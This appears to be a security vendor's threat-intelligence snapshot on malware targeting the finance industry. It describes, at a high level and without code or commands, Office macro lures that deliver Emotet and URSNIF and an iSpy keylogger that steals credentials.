Malscape Snapshot: Finance
Moving to the latest 100 threat reports that specifically target the finance industry we can see that we have captured a Microsoft Office-based campaign. Various office file extensions comprise 62% of the recent file types with the remaining 38% being Portable Executable Files (see Figure 1).
Of the recent file types, 69% are Unclassified in terms of the specific type of malware detected. This means that at time of submission to Lastline they had already been submitted to VirusTotal, but there was no positive detection of maliciousness (see Figure 6). The unclassified rate for Microsoft Office files is 99% in this time frame.
Figure 2: The latest 100 threats by the type of malware detected.
Figure 1: The latest 100 threats seen in finance and their file type.
These high levels of Microsoft Office documents often share a common lure, an example of which is shown in Figure 3, which demonstrate a consistent set of behaviors, as shown in Figure 8. These documents used Windows scripting utilities like PowerShell to download the final payload, which is often a new variant of sophisticated keylogger malware, URSNIF or Emotet.
Figure 3: Example of a Microsoft Office lure.
Figure 4: Behaviors displayed by the malicious document.
We can see the infection techniques undertaken by the malicious Office files in Figure 8. Once the user has enabled the content of the Office document, the malware starts to spawn command shell and PowerShell to get the main payload from an Internet address located inside the document. Both main payloads are mature modular trojans that keep adding functionality to their arsenal. And both have a number of pseudonyms, Emotet aka Geodo, Feodo and URSNIFF, aka Gozi, ISFB, Goznym.
It’s not only commonalities in the lure document that Emotet and URSNIF share. Emotet first spotted in 2014 shares some of its functional design with URSNIF which dates back to 2007. They also share an evasion module for detecting dynamic analysis environments, and common methods for infiltrating financial transactions such as a man-in-the-middle network sniffing capability and hijacking automated transfer payments. Being modular in nature, criminals have developed and added new features over time, including lateral movement, additional credential theft, and spam capabilities.
Trojan.filerepmalware and Suspicious Filerepmalware are iSpy Keyloggers
Figure 5: Behaviors displayed by trojan.filerepmalware. Figure 9: Behaviours displayed by trojan.filerepmalware.
By intercepting the communication with the command and control server we found an identifying signature of the iSpy Keylogger tool in the process of exfiltrating website, email, and FTP credentials for this victim as well as license key information for installed products (see Figure 6).
Figure 6: Example of iSpy Keylogger stealing credentials.
Figure 7: Criminals, including HawkSpy, are using Twitter to promote the iSpy Keylogger.
The iSpy Keylogger (see Figure 7 for an example of how it is being promoted by one particular criminal organization) is a variant of the notorious HawkEye logger, a fully functioning keylogger that sends victim credentials via SMTP or FTP to a server under the keylogger operators control. Samples analyzed by Lastline in this time frame sent victim credentials to an outsourcing organization based in India with ISO27001:2013 accreditation. This might indicate victim reuse on behalf of the keylogger operator. Not only are victim credentials used to infiltrate business transactions, but prior victims’ infrastructure also is being used to receive stolen data from new victims.
The threats described in this snapshot are the result of our analysis of all threats targeting finance departments and the financial industry over the past 30 days, plus the 100 latest malware samples submitted by Lastline customers specifically in the financial vertical. There were significant differences in the trends seen as compared to the global average, probably due to (appropriately) heightened levels of security controls in finance. These levels have raised the bar for cyberthreats to successfully infect a device on an internal finance network. The increased sophistication of the attacks that we analyzed in these latest 100 threats – fast evolving email campaigns that avoided detection and professionally developed modular payloads with advanced evasion techniques – demonstrates how criminals have raised the bar in their attacks against a well-prepared finance industry.
To read about the global trends against which we compared our findings in Finance in this snapshot, please download our Q4 2017 Malscape Monitor Report.